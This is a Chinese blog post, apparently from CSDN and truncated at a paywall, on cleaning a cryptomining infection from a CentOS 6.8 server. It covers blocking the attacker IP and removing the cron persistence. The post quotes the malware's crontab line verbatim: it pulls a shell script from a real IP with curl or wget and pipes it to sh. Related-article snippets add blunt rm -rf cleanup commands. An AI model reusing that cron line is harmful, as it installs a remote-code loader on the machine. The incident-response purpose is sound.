centos6.8服务器中了挖矿程序病毒的解决方法

最新推荐文章于 2024-06-13 10:23:16 发布
最新推荐文章于 2024-06-13 10:23:16 发布
阅读量911 收藏 1
点赞数
分类专栏: shell ubuntu 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/emtit2008/article/details/100537488
版权

阿里云提示我的centos服务器出现紧急安全事件:挖矿程序;同时也出现服务器异常登录事件。

出现这样的情况,需要根据以下的步骤去处理

第一步:修改登录的帐号密码,输入命令passwd,根据提未修改。

第二步:禁用可疑的IP,阿里云会有一些IP提示,先把异常登录的IP禁用;命令如下

iptables -I INPUT -s 68.183.140.39 -j DROP  //禁用指定的IP

iptables -L -n -v //查看防火墙当前的状态

第三步:删除挖矿病毒程序,大部分的程序无法是常驻内部并且增加一个守护进程,或者直接在crontab中加入定时任务;

我们先解决最简单的,把crontab中的可疑定时任务删除。

输入crontab -e查看,发现以下的定时任务

*/15 * * * * (/usr/bin/uzmnfa4||/usr/libexec/uzmnfa4||/usr/local/bin/uzmnfa4||/tmp/uzmnfa4||curl -m180 -fsSL http://68.183.140.39:8000/i.sh||wget -q -T180 -O- http://68.183.140.39:8000/i.sh) | sh

根据此命令去查找相应的病毒文件,使用r

最低0.47元/天 解锁文章
PHP黄建文
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux 挖矿程序病毒文件锁住了,删不了,怎么破?(chattr)
LuciferLiu_DBA
09-12 2787
每天一个 DBA 小知识,助你更进一步!
Centos7 处理挖矿病毒初探
wolf1105的博客
08-15 7101
1、首先查看top命令下占用cpu最高的是什么进程 #top #lsof 进程名 如果是挖矿程序可以看到明显的异常 具体lsof的用法 请参考 https://www.cnblogs.com/sparkbj/p/7161669.html 确定挖矿程序的路径以后,先kill掉进程,再删除文件 #kill -9 555 #rm -rf /tmp/wakuang.sh 2、清理定时任务 一般只...
centos8 处理挖矿程序攻击
Wangthebest的专栏
05-30 1396
ll /usr/bin/top* top命令被修改,并且隐藏了两个进程 chattr命令不可用,先删除e2fsprogs再重新安装。 yum remove e2fsprogs #rpm -qa|grep e2fsprogs yum -y install e2fsprogs #yum install e2fsprogs-1.45.6-2.el8.x86_64 解锁TOP文件并恢复 chattr -i top mv top top.rm mv top.lanigiro top 4.
如何在centos和windows server找到挖矿木马和消灭挖矿木马
最新发布
weixin_45631123的博客
06-13 719
解决挖矿木马
centos7挖矿病毒(xmrig,javs)清理
yuanwendong11的博客
07-26 3513
1. 查看计划任务 ls /var/spool/cron 删除异常任务其配置项。如果当前系统之前并未配置过计划任务,可以直接删除计划脚本目录即可: rm -rf /var/spool/cron/* 2. 查看密钥认证文件 删除木马创建的密钥认证文件,如果当前系统之前并未配置过密钥认证,可以直接清空认证存放目录: rm -rf /root/.ssh/* 如果有配置过密钥认证,需要删除指定的黑客创建的认证文件即可。 3. 修复 SSH 配置项 一般默认脚本进行修改的 PermitRootLogin、R.
centos清理挖矿病毒[crypto][pnscan]
技术研究中心
07-16 1546
centos清理挖矿病毒[crypto][pnscan] 新买的云服务器cpu占用100%,瞬间想到挖矿木马。 排查过程如下: 1、top命令查看进程占用情况,没有发现可疑进程,而且cpu的total used也是正常的,但cpu占用率是100%,显然,木马进程被恶意隐藏了,常规的ps命令肯定找不到。 2、想到挖矿木马都有一个特点,都会连接到外网,于是执行netstat -anptl命令,但提示没权限,狗日的netstat不能用了 3、想到使用chattr -i /usr/bin/netstat,但提示没权
主机有被植入挖矿病毒篡改系统库文件
eagle89的专栏
04-08 1004
主机有被植入挖矿病毒篡改系统库文件
centos6.8-离线安装docker环境所需的rpm
08-30
由于是离线安装,我们需要预先准备包含所需RPM包的压缩文件“centos6.8-离线安装docker所需的rpm”。 首先,我们需要了解Docker是什么。Docker是一个开源的应用容器引擎,基于Go语言并遵循Apache2.0协议开源。它...
CentOS6.8-64-百度云盘链接
05-20
CentOS6.8-64-百度云盘链接
CentOS6.8-64位系统-百度云盘链接
05-19
CentOS6.8-64-百度云盘链接
centos6.8-DVD版本安装图解.docx
12-12
常见问题和解决方法 * 无法启动安装光盘或 USB 设备:检查 BIOS 设置,确保计算机从 CD/DVD 或 USB 设备启动。 * 安装过程出现错误:检查安装光盘或 USB 设备的完整性,重试安装过程。 * 无法连接网络:检查网络...
CentOS6.8/英文环境切换教程图解
09-14
- 另一种方法是修改`/etc/sysconfig/i18n`文件,虽然这也能影响终端提示信息的语言,但在CentOS 6.8及Redhat 6.5,它并不足以改变整个系统的语言环境,特别是图形界面和文件夹名称。相比之下,`/etc/profile`的...
服务器挖矿了怎么办,实战清退
qq_14926283的博客
03-25 1333
然后看看有没有定时任务,有的时候它会定时去检测xmrig挖矿木马是否在正常运行,不正常它会重新去做一系列的处理,重新植入木马,这时候我们要去取消这些定时任务。注意这些看起来像系统进程的最好不要kill掉,容易出现意外,把生产环境的服务给干费了,那我们得去删掉这个后门用户怎么办。可以看到我这边有一个名为xmrig(有经验的这里看到名字直接就能判断)的进程霸占了100.3的资源,这里招了。第一时间重启服务是不行的,这些挖矿木马一定是会伴随着你的重启而自动重启,一定时间内重新霸占你的服务器资源。
centos 处理挖矿病毒
weixin_44606690的博客
01-04 489
处理挖矿病毒,真的恶心啊占用CPU百分之50
Linux挖矿病毒清理通用思路
dayouzi的博客
04-19 3633
在被植入挖矿病毒后,如果攻击者拥有足够的权限,比如root权限,往往会对系统命令进行劫持,达到隐藏自己的效果,故第一步最好是先确认是否存在rootkit劫持、库劫持,之后的命令执行操作也最好是通过busybox执行。
Centos挖矿病毒处理过程
2301_77388529的博客
04-03 895
服务器系统毒后一般会出现异常进程,负载高,CPU占用高,带宽跑满的情况, 为防止你的服务器招建议服务器 FTP 数据库 网站 Redis等请勿使用简单的密码 轻的只会跑资源 严重的删网站删库 下面说下毒的处理流程。建议:处理完成之后备份好数据重装系统,病毒作者可能还留有后门,重装系统后加强密码 服务器管理 安装相应的防御软件 希望该教程能让你get到技能。rm /bin/dhpcd ###确定该进程不是自己安装的删除该文件,不确定可以先mv到其他目录。直接使用”dd”,删除计划任务。
高级运维开发工程师带你处理linux木马(挖矿病毒)实战例子
nasen512的博客
07-10 2418
高级运维开发工程师带你处理linux木马(挖矿病毒)实战例子。
详解Linux防火墙iptables禁IP与解封IP常用命令
wejack的专栏
12-02 4053
文章系转载,便于整理和归纳,源文地址:https://cloud.tencent.com/developer/article/1722230 在Linux服务器被攻击的时候,有的时候会有几个主力IP。如果能拒绝掉这几个IP的攻击的话,会大大减轻服务器的压力,说不定服务器就能恢复正常了。 在Linux下封停IP,有封杀网段和封杀单个IP两种形式。一般来说,现在的攻击者不会使用一个网段的IP来攻击(太招摇了),IP一般都是散列的。于是下面就详细说明一下封杀单个IP的命令,和解封单个IP的命令。 Linux防.
centos6.8 百度资源
07-18
CentOS是一个基于Linux的操作系统,而CentOS 6.8是其的一个发行版本。用户可以通过百度资源来获取关于CentOS 6.8的相关资料和资源。 在百度资源,用户可以找到CentOS 6.8的官方网站、官方文档、官方论坛等。官方网站是用户获取CentOS 6.8 ISO镜像文件的最佳途径。用户可以通过官方文档了解CentOS 6.8的安装指南、配置手册、系统管理等内容。官方论坛是用户交流与分享CentOS 6.8的问题、经验和建议的平台。 此外,用户在百度资源也可以找到其他第三方网站和技术文章,提供了更多关于CentOS 6.8的资源和资料。这些比如CentOS文社区、博客等,都可以帮助用户深入了解CentOS 6.8的功能和使用方法。 总之,通过百度资源,用户能够方便地获取与CentOS 6.8相关的资料、下载ISO镜像、了解配置与管理等技术文档,以及参与论坛交流等,提高自身对CentOS 6.8操作系统的理解和应用能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值